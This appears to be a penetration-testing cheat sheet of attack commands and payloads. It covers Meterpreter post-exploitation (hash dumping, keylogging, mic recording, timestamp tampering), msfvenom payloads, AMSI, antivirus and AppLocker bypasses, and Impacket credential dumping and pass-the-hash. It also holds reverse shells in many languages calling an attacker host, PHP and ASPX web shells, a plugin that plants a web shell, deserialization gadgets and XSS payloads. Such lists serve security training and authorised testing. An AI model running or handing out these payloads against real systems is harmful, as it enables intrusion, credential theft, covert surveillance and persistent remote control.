meterpreter > getsystem // gain system privileges if user is member of administrator group
meterpreter > hashdump // dumps all the user hashes
meterpreter > run post /windows /gather /checkvm // check status of the target
meterpreter > run post /multi /recon /local_exploit_suggester // checking for exploits
meterpreter > run post /windows /manage /enable_rdp // enables rdp
meterpreter > run post /multi /manage /autoroute // runs autoroutes
meterpreter > run auxiliary /server /socks4a // runs socks4 proxy server
meterpreter > keyscan_start // enabled keylogger
meterpreter > keyscan_dump // showing the output
meterpreter > screenshare // realtime screen sharing
meterpreter > screenshare - q 100 // realtime screen sharing
meterpreter > record_mic // recording mic output
meterpreter > timestomp // modify timestamps
meterpreter > execute - f calc .exe // starts a program on the victim
meterpreter > portfwd add - l < LPORT > - p < RPORT > - r 127.0 .0 .1 // port forwarding
Metasploit through Proxychains
proxychains - q msfconsole
Meterpreter Listener
Generate Payload
msfvenom - p windows /x64 /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f exe - o meterpreter_payload .exe
Setup Listener for Microsoft Windows
msf6 > use exploit /multi /handler
[* ] Using configured payload generic /shell_reverse_tcp
msf6 exploit (multi /handler ) > set payload windows /x64 /meterpreter /reverse_tcp
payload = > windows /x64 /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
LHOST = > < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LPORT >
LPORT = > < LPORT >
msf6 exploit (multi /handler ) > run
Download Files
msfvenom - p windows /x64 /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f exe - o < FILE > exe
msf6 > use exploit /multi /handler
[* ] Using configured payload generic /shell_reverse_tcp
msf6 exploit (multi /handler ) > set payload windows /x64 /meterpreter /reverse_tcp
payload = > windows /x64 /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
LHOST = > < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LPORT >
LPORT = > < LPORT >
msf6 exploit (multi /handler ) > run
Enumeration
SNMP Scan
msf6 > use auxiliary /scanner /snmp /snmp_login
msf6 auxiliary (scanner /snmp /snmp_login ) > set RHOSTS < RHOST >
msf6 auxiliary (scanner /snmp /snmp_login ) > run
SNMP Enum
msf6 > use auxiliary /scanner /snmp /snmp_enum
msf6 auxiliary (scanner /snmp /snmp_enum ) > set RHOSTS < RHOST >
msf6 auxiliary (scanner /snmp /snmp_enum ) > run
Tomcat Enumeration
msf6 > use auxiliary /scanner /http /tomcat_mgr_login
msf6 auxiliary (scanner /http /tomcat_mgr_login ) > set RHOSTS < RHOST >
msf6 auxiliary (scanner /http /tomcat_mgr_login ) > run
Exploit Suggester
msf6 exploit (multi /handler ) > use post /multi /recon /local_exploit_suggester
msf6 post (multi /recon /local_exploit_suggester ) > set session 1
msf6 post (multi /recon /local_exploit_suggester ) > run
Auxiliary Handling
Auxiliary Setup
msf6 > use auxiliary /scanner /http /tvt_nvms_traversal
msf6 auxiliary (scanner /http /tvt_nvms_traversal ) > set RHOSTS < RHOST >
msf6 auxiliary (scanner /http /tvt_nvms_traversal ) > set FILEPATH Users /Nathan /Desktop /Passwords .txt
msf6 auxiliary (scanner /http /tvt_nvms_traversal ) > run
Auxiliary Output Directory
/home /kali /.msf4 /loot /20200623090635 _default_ < RHOST > _nvms .traversal_680948 .txt
ShellShock
curl - H 'Cookie : () { :;}; /bin /bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 ' http ://<RHOST>/cgi-bin/user.sh
Post Exploitation
AMSI
Test String
PS C :\> $str = 'amsiinitfailed '
Bypass
PS C :\> $str = 'ams ' + 'ii ' + 'nitf ' + 'ailed '
AppLocker Bypass List
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
autologon
powershell - c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users \Public \Downloads \nc .exe ' - argumentlist '- e cmd < LHOST > < LPORT > ' - Credential $cred "
Bash Privilege Escalation
Basic Linux Enumeration
id
sudo - l
uname - a
cat /etc /hosts
cat /etc /fstab
cat /etc /passwd
ss - tulpn
ps - auxf
ls - lahv
ls - R /home
Basic Windows Enumeration
systeminfo
whoami /all
net users
net users < USERNAME >
Evil-WinRM
sudo ruby /usr /local /bin /evil - winrm - i < RHOST > - u < USERNAME > - p < PASSWORD >
find Commands
find . / - type f - exec grep -- color = always - i - I 'password ' {} \;
find / - group < group > 2 > /dev /null
find / - user < USERNAME > 2 > /dev /null
find / - user < USERNAME > - ls 2 > /dev /null
find / - user < USERNAME > 2 > /dev /null | grep - v proc 2 > /dev /null
find / - user < USERNAME > - ls 2 > /dev /null | grep - v proc 2 > /dev /null
find / - perm - 4000 2 > /dev /null
find / - perm - 4000 2 > /dev /null | xargs ls - la
find / - type f - user root - perm - 4000 2 > /dev /null
grep for Passwords
grep - R db_passwd
grep - roiE "password.{20}"
grep - oiE "password.{20}" /etc /* .conf
Impacket
impacket - smbserver local . - smb2support
impacket - reg < RHOST > /< USERNAME > :< PASSWORD :PASSWORD_HASH > @< RHOST > < ACTION > < ACTION >
impacket - services < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST > < ACTION >
impacket - netview < RHOST > /< USERNAME > - targets /PATH /TO /FILE /< FILE > .txt - users /PATH /TO /FILE /< FILE > .txt
impacket - lookupsid < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - GetADUsers - all - dc - ip < RHOST > < RHOST > /
impacket - getST < RHOST > /< USERNAME > - spn WWW /< DOMAIN_CONTROLLER > .< RHOST > - hashes :d64b83fe606e6d3005e20ce0ee932fe2 - impersonate Administrator
impacket - rpcdump < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - samrdump < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - atexec - k - no - pass < RHOST > /Administrator @< DOMAIN_CONTROLLER > .< RHOST > 'type C :\PATH \TO \FILE \<FILE > '
impacket-smbclient
export KRB5CCNAME = < USERNAME > .ccache
impacket - smbclient < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - smbclient - k < RHOST > /< USERNAME > @< RHOST > .< RHOST > - no - pass
impacket-getTGT
impacket - getTGT < RHOST > /< USERNAME > :< PASSWORD >
impacket - getTGT < RHOST > /< USERNAME > - dc - ip < RHOST > - hashes aad3b435b51404eeaad3b435b51404ee :7 c662956a4a0486a80fbb2403c5a9c2c
impacket-GetNPUsers
impacket - GetNPUsers < RHOST > / - usersfile usernames .txt - format hashcat - outputfile hashes .asreproast
impacket - GetNPUsers < RHOST > /< USERNAME > - request - no - pass - dc - ip < RHOST >
impacket - GetNPUsers < RHOST > / - usersfile usernames .txt - format john - outputfile hashes
impacket-getUserSPNs / GetUserSPNs.py
export KRB5CCNAME = < USERNAME > .ccache
impacket - GetUserSPNs < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < RHOST > .< RHOST > - no - pass - request
./GetUserSPNs .py < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < RHOST > .< RHOST > - no - pass - request
impacket-secretsdump
export KRB5CCNAME = < USERNAME > .ccache
impacket - secretsdump < RHOST > /< USERNAME > @< RHOST >
impacket - secretsdump - k < RHOST > /< USERNAME > @< RHOST > .< RHOST > - no - pass - debug
impacket - secretsdump - ntds ndts .dit - system system - hashes lmhash :nthash LOCAL - output nt - hash
impacket - secretsdump - dc - ip < RHOST > < RHOST > .LOCAL /svc_bes :< PASSWORD > @< RHOST >
impacket - secretsdump - sam SAM - security SECURITY - system SYSTEM LOCAL
impacket-psexec
impacket - psexec < USERNAME > @< RHOST >
impacket - psexec < RHOST > /administrator @< RHOST > - hashes aad3b435b51404eeaad3b435b51404ee :8 a4b77d52b1845bfe949ed1b9643bb18
impacket-ticketer
Requirements
Valid User
NTHASH
Domain-SID
export KRB5CCNAME = < USERNAME > .ccache
impacket - ticketer - nthash C1929E1263DDFF6A2BCC6E053E705F78 - domain - sid S - 1 - 5 - 21 - 2743207045 - 1827831105 - 2542523200 - domain < RHOST > - spn MSSQLSVC /< RHOST > .< RHOST > - user - id 500 Administrator
Fixing [-] exceptions must derive from BaseException
Issue:
./GetUserSPNs .py < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < DOMAIN_CONTROLLER > .< RHOST > - no - pass - request
Impacket v0 .10 .0 - Copyright 2022 SecureAuth Corporation
[- ] exceptions must derive from BaseException
How to fix it:
241 if self .__doKerberos :
242 #target = self.getMachineName()
243 target = self .__kdcHost
Juicy Potato
msfvenom - p windows /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - b "\x00\x0a" - a x86 -- platform windows - f exe - o exploit .exe
msf6 > use exploit /multi /handler
msf6 exploit (multi /handler ) > set payload windows /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LHOST >
msf6 exploit (multi /handler ) > run
.\exploit .exe
PowerShell
General Usage
Allow Script Execution
PS C :\> set - executionpolicy remotesigned
PS C :\> Set - ExecutionPolicy unrestricted
Script Execution Bypass
PS C :\> powershell .exe - noprofile - executionpolicy bypass - file .\<FILE > .ps1
Import Module to PowerShell cmdlet
PS C :\> import - module ./< module / powershell script >
Check PowerShell Versions
PS Set - ExecutionPolicy Unrestricted
PS powershell - Command "$PSVersionTable.PSVersion"
PS powershell - c "[Environment]::Is64BitProcess"
Start offsec Session
PS /home /kali > $offsec_session = New - PSSession - ComputerName < RHOST > - Authentication Negotiate - Credential < USERNAME >
PS /home /kali > Enter - PSSession $offsec_session
PSCredential
Import - CliXml
Export - CliXml
PS C :\> powershell - c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
AntiVirus Handling
AntiVirus Bypass for Invoke-Expression (IEX)
PS C :\> < COMMAND > | & ( $PsHOme [4 ]+ $PShoMe [30 ]+ 'x ')
Explaination
$PSHome [4 ] // equals "i"
$PSHome [30 ] // equals "e"
+ x // adds an "x"
Alternative
PS C :\> $eNV :COmSPeC [4 ,15 ,25 ]- JOiN ''
Explaination
$eNV :COmSPeC [4 ] // equals "i"
$eNV :COmSPeC [15 ] // equals "e"
$eNV :COmSPeC [25 } // equals "x"
System
Show current User
PS C :\> whoami /all
PS C :\> getuserid
Show Groups
Get System Information
Get Process List
Get net user Information
PS C :\> net users
PS C :\> net users < USERNAME >
Get User List
PS C :\> Get - ADUser - Filter * - SearchBase "DC=<RHOST>,DC=LOCAL"
Invoke-Expression File Transfer
PS C :\> IEX (IWR http ://<LHOST>/<FILE>.ps1) -UseBasicParsing)
Add new Domain Administrator
PS C :\> $PASSWORD = ConvertTo - SecureString –AsPlainText - Force - String < PASSWORD >
PS C :\> New - ADUser - Name "< USERNAME > " -Description " < DESCRIPTION > " -Enabled $true -AccountPassword $PASSWORD
PS C :\> Add - ADGroupMember - Identity "Domain Admins" - Member < USERNAME >
Execute Commands in User Context
PS C :\> $pass = ConvertTo - SecureString "< PASSWORD > " -AsPlaintext -Force
PS C :\> $cred = New - Object System .Management .Automation .PSCredential ("<DOMAIN>\<USERNAME>" , $pass )
PS C :\> Invoke - Command - computername < COMPUTERNAME > - ConfigurationName dc_manage - credential $cred - command {whoami }
Execute Scripts with Credentials (Reverse Shell)
PS C :\Windows \system32 > $pass = ConvertTo - SecureString "< PASSWORD > " -AsPlainText -Force
PS C :\Windows \system32 > $cred = New - Object System .Management .Automation .PSCredential ("<DOMAIN>\<USERNAME>" , $pass )
PS C :\Windows \system32 > Invoke - Command - Computer < RHOST > - ScriptBlock { IEX (New - Object Net .WebClient ).downloadString ('http ://<LHOST>/<FILE>.ps1') } -Credential $cred
New-PSSession
PS C :\Users \<USERNAME > \Downloads \backups > $username = "<DOMAIN>\<USERNAME>"
$username = "<DOMAIN>\<USERNAME>"
PS C :\Users \<USERNAME > \Downloads \backups > $password = "<PASSWORD>"
$password = "<PASSWORD>"
PS C :\Users \<USERNAME > \Downloads \backups > $secstr = New - Object - TypeName System .Security .SecureString
$secstr = New - Object - TypeName System .Security .SecureString
PS C :\Users \<USERNAME > \Downloads \backups > $password .ToCharArray () | ForEach - Object {$secstr .AppendChar ($_ )}
$password .ToCharArray () | ForEach - Object {$secstr .AppendChar ($_ )}
PS C :\Users \<USERNAME > \Downloads \backups > $cred = new - object - typename System .Management .Automation .PSCredential - argumentlist $username , $secstr
$cred = new - object - typename System .Management .Automation .PSCredential - argumentlist $username , $secstr
PS C :\Users \<USERNAME > \Downloads \backups > new - pssession - computername . - credential $cred
new - pssession - computername . - credential $cred
Id Name ComputerName ComputerType State ConfigurationName Availability
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- - -- -- -- -- -- --
1 WinRM1 localhost RemoteMachine Opened Microsoft .PowerShell Available
PS C :\Users \<USERNAME > \Downloads \backups > enter - pssession 1
enter - pssession 1
[localhost ]: PS C :\Users \<USERNAME > \Documents > whoami
whoami
< DOMAIN > \<USERNAME >
Windows Tasks & Services
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery .exe /v /fo csv | ConvertFrom - CSV | Select - Object 'Display Name ', 'Start Mode ', Path
sc query
sc qc < service - name >
accesschk .exe - uws "Everyone " " C :\Program Files "
dir /s * pass * = = * cred * = = * vnc * = = * .config *
findstr /si password * .xml * .ini * .txt
wmic qfe get Caption ,Description ,HotFixID ,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
Payloads
Reverse Shells
Bash Reverse Shell
bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1
bash - c 'bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 '
echo - n '/bin /bash - c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" ' | base64
curl Reverse Shell
curl -- header "Content-Type: application/json" -- request POST http ://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
JAVA Reverse Shell
r = Runtime .getRuntime ()
p = r .exec (["/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String [])
p .waitFor ()
$ r = Runtime .getRuntime (); p = r .exec (["/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String []); p .waitFor ();
shell.jar
package < NAME > ;
import org .bukkit .plugin .java .JavaPlugin ;
import java .io .IOException ;
import java .nio .file .Files ;
import java .nio .file .Paths ;
import java .nio .file .StandardOpenOption ;
public class Main extends JavaPlugin {
@Override
public void onDisable () {
super .onDisable ();
}
@Override
public void onEnable () {
final String PHP_CODE = "<?php system($_GET['cmd']); ?>" ;
try {
Files .write (Paths .get ("/var/www/<RHOST>/shell.php" ), PHP_CODE .getBytes (), StandardOpenOption .CREATE_NEW );
} catch (IOException e ) {
e .printStackTrace ();
}
super .onEnable ();
}
}
Lua Reverse Shell
http ://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")--
Markdown Reverse Shell
-- ';bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 ;'--
mkfifo Reverse Shell
mkfifo /tmp /shell ; nc < LHOST > < LPORT > 0 < /tmp /shell | /bin /sh > /tmp /shell 2 > & 1 ; rm /tmp /shell
Netcat Reverse Shell
nc - e /bin /sh < LHOST > < LPORT >
Perl Reverse Shell
perl - e 'use Socket ;$i = "<LHOST>" ;$p = < LPORT > ;socket (S ,PF_INET ,SOCK_STREAM ,getprotobyname ("tcp" ));if (connect (S ,sockaddr_in ($p ,inet_aton ($i )))){open (STDIN ,">&S" );open (STDOUT ,">&S" );open (STDERR ,">&S" );exec ("/bin/sh -i" );};'
PHP Reverse Shell
php - r '$sock = fsockopen ("<LHOST>" ,< LPORT > );exec ("/bin/sh -i <&3 >&3 2>&3" );'
PowerShell Reverse Shell
$client = New - Object System .Net .Sockets .TCPClient ("<LHOST>" ,< LPORT > );$stream = $client .GetStream ();[byte []]$bytes = 0. .65535 |%{0 };while (($i = $stream .Read ($bytes , 0 , $bytes .Length )) - ne 0 ){;$data = (New - Object - TypeName System .Text .ASCIIEncoding ).GetString ($bytes ,0 , $i );$sendback = (iex $data 2 > & 1 | Out - String );$sendback2 = $sendback + "# " ;$sendbyte = ( [text .encoding ]::ASCII ).GetBytes ($sendback2 );$stream .Write ($sendbyte ,0 ,$sendbyte .Length );$stream .Flush ()};$client .Close ()
powershell - nop - c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell - nop - exec bypass - c '$client = New - Object System .Net .Sockets .TCPClient ("<LHOST>" ,< LPORT > );$stream = $client .GetStream ();[byte []]$bytes = 0. .65535 |%{0 };while (($i = $stream .Read ($bytes , 0 , $bytes .Length )) - ne 0 ){;$data = (New - Object - TypeName System .Text .ASCIIEncoding ).GetString ($bytes ,0 , $i );$sendback = (iex $data 2 > & 1 | Out - String );$sendback2 = $sendback + "PS " + (pwd ).Path + "> " ;$sendbyte = ( [text .encoding ]::ASCII ).GetBytes ($sendback2 );$stream .Write ($sendbyte ,0 ,$sendbyte .Length );$stream .Flush ()};$client .Close ()'
minireverse.ps1
$socket = new - object System .Net .Sockets .TcpClient ('127.0 .0 .1 ', 413 );
if ($socket - eq $null ){exit 1 }
$stream = $socket .GetStream ();
$writer = new - object System .IO .StreamWriter ($stream );
$buffer = new - object System .Byte [] 1024 ;
$encoding = new - object System .Text .AsciiEncoding ;
do
{
$writer .Flush ();
$read = $null ;
$res = ""
while ($stream .DataAvailable - or $read - eq $null ) {
$read = $stream .Read ($buffer , 0 , 1024 )
}
$out = $encoding .GetString ($buffer , 0 , $read ).Replace ("`r`n" ,"" ).Replace ("`n" ,"" );
if (!$out .equals ("exit" )){
$args = "" ;
if ($out .IndexOf (' ' ) - gt - 1 ){
$args = $out .substring ($out .IndexOf (' ' )+ 1 );
$out = $out .substring (0 ,$out .IndexOf (' ' ));
if ($args .split (' ' ).length - gt 1 ){
$pinfo = New - Object System .Diagnostics .ProcessStartInfo
$pinfo .FileName = "cmd.exe"
$pinfo .RedirectStandardError = $true
$pinfo .RedirectStandardOutput = $true
$pinfo .UseShellExecute = $false
$pinfo .Arguments = "/c $out $args"
$p = New - Object System .Diagnostics .Process
$p .StartInfo = $pinfo
$p .Start () | Out - Null
$p .WaitForExit ()
$stdout = $p .StandardOutput .ReadToEnd ()
$stderr = $p .StandardError .ReadToEnd ()
if ($p .ExitCode - ne 0 ) {
$res = $stderr
} else {
$res = $stdout
}
}
else {
$res = (& "$out" "$args" ) | out - string ;
}
}
else {
$res = (& "$out" ) | out - string ;
}
if ($res - ne $null ){
$writer .WriteLine ($res )
}
}
}While (!$out .equals ("exit "))
$writer .close ();
$socket .close ();
$stream .Dispose ()
Python Reverse Shell
python - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);'
python3 - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);'
python - c 'import pty ,subprocess ,os ,time ;(master ,slave )= pty .openpty ();p = subprocess .Popen (["/bin/su" ,"-c" ,"id" ,"bynarr" ],stdin = slave ,stdout = slave ,stderr = slave );os .read (master ,1024 );os .write (master ,"fruity\n" );time .sleep (0.1 );print os .read (master ,1024 );'
echo python3 - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);' > < FILE > < ( ),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);' > < FILE >
Ruby Reverse Shell
ruby - rsocket - e 'f = TCPSocket .open ("<LHOST>" ,< LPORT > ).to_i ;exec sprintf ("/bin/sh -i <&%d >&%d 2>&%d" ,f ,f ,f )'
Web Shells
PHP Web Shell
< ?php system ($_GET ['cmd ' ]); ?>
< ?php echo exec ($_POST ['cmd ' ]); ?>
< ?php echo passthru ($_GET ['cmd ' ]); ?>
< ?php passthru ($_REQUEST ['cmd ' ]); ?>
< ?php echo system ($_REQUEST ['shell ' ]): ?>
nishang
cd path /to /nishang /Shells /
cp Invoke - PowerShellTcp .ps1 Invoke - PowerShellTcp .ps1
tail - 3 Invoke - PowerShellTcp .ps1
}
Invoke - PowerShellTcp - Reverse - IPAddress < LHOST > - Port < LPORT >
powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"
Shikata Ga Nai
msfvenom - p windows /shell_reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f c - a x86 -- platform windows - b "\x00\x0a\x0d" - e x86 /shikata_ga_nai
msfvenom - a x86 -- platform windows - p windows /shell /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - b "\x00" - e x86 /shikata_ga_nai - f exe - o /tmp /shell .exe
ysoserial
java - jar ysoserial - master - SNAPSHOT .jar
java - jar ysoserial - master - SNAPSHOT .jar CommonsCollections1 'nc < LHOST > < LPORT > - e /bin /sh ' | base64 - w 0
java - jar ysoserial .jar Groovy1 calc .exe > groovypayload .bin
java - jar ysoserial - master - 6eca5bc740 - 1. jar CommonsCollections4 "$jex" > /tmp /$filename .session
Templates
ASPX Web Shell
< ?xml version = "1.0" encoding = "UTF-8" ?>
< configuration >
< system .webServer >
< handlers accessPolicy = "Read, Script, Write" >
< add name = "web_config" path = "*.config" verb = "*" modules = "IsapiModule" scriptProcessor = "%windir%\system32\inetsrv\asp.dll" resourceType = "Unspecified" requireAccess = "Write" preCondition = "bitness64" />
< /handlers >
< security >
< requestFiltering >
< fileExtensions >
< remove fileExtension = ".config" />
< /fileExtensions >
< hiddenSegments >
< remove segment = "web.config" />
< /hiddenSegments >
< /requestFiltering >
< /security >
< /system .webServer >
< /configuration >
< !-- ASP code comes here ! It should not include HTML comment closing tag and double dashes !
< %
Set s = CreateObject ("WScript.Shell" )
Set cmd = s .Exec ("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')" )
o = cmd .StdOut .Readall ()
Response .write (o )
%>
-- >
Bad YAML
- hosts : localhost
tasks :
- name : badyml
command : chmod + s /bin /bash
Exploit Skeleton Python Script
#!/usr /bin /python
import socket ,sys
address = '127.0 .0 .1 '
port = 9999
buffer = #TBD
try :
print '[+ ] Sending buffer '
s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
s .connect ((address ,port ))
s .recv (1024 )
s .send (buffer + '\r\n' )
except :
print '[!] Unable to connect to the application .'
sys .exit (0 )
finally :
s .close ()
JSON POST Request
POST /< path > HTTP /1.1
Host : < RHOST >
User - Agent : Mozilla /5.0 (X11 ; Linux x86_64 ; rv :78.0 ) Gecko /20100101 Firefox /78.0
Accept : * /*
Accept - Language : en - US ,en ;q = 0.5
Content - Type : application /json
Content - Length : 95
Connection : close
{
"auth" :{
"name" :"<USERNAME>" ,
"password" :"< PASSWORD > "
},
"filename" :"< FILE > "
}
XSS
Basic Payloads
< script > alert ('XSS ' )< /script >
< scr < script > ipt > alert ('XSS ' )< /scr < script > ipt >
"><script>alert('XSS')</script>
" > < script > alert (String .fromCharCode (88 ,83 ,83 ))< /script >
< script src = "http://<LHOST>/<FILE>" > < /script >
IMG Payloads
< img src = x onerror = alert ('XSS ' );>
< img src = x onerror = alert ('XSS ' )//
< img src = x onerror = alert (String .fromCharCode (88 ,83 ,83 ));>
< img src = x oneonerrorrror = alert (String .fromCharCode (88 ,83 ,83 ));>
< img src = x :alert (alt ) onerror = eval (src ) alt = xss >
"><img src=x onerror=alert('XSS');>
" > < img src = x onerror = alert (String .fromCharCode (88 ,83 ,83 ));>
SVG Payloads
< svgonload = alert (1 )>
< svg /onload = alert ('XSS ' )>
< svg onload = alert (1 )//
< svg /onload = alert (String .fromCharCode (88 ,83 ,83 ))>
< svg id = alert (1 ) onload = eval (id )>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
" > < svg /onload = alert (/XSS / )
< svg > < script href = data :,alert (1 ) /> (`Firefox ` is the only browser which allows self closing script )
DIV Payloads
< div onpointerover = "alert(45)" > MOVE HERE < /div >
< div onpointerdown = "alert(45)" > MOVE HERE < /div >
< div onpointerenter = "alert(45)" > MOVE HERE < /div >
< div onpointerleave = "alert(45)" > MOVE HERE < /div >
< div onpointermove = "alert(45)" > MOVE HERE < /div >
< div onpointerout = "alert(45)" > MOVE HERE < /div >
< div onpointerup = "alert(45)" > MOVE HERE < /div >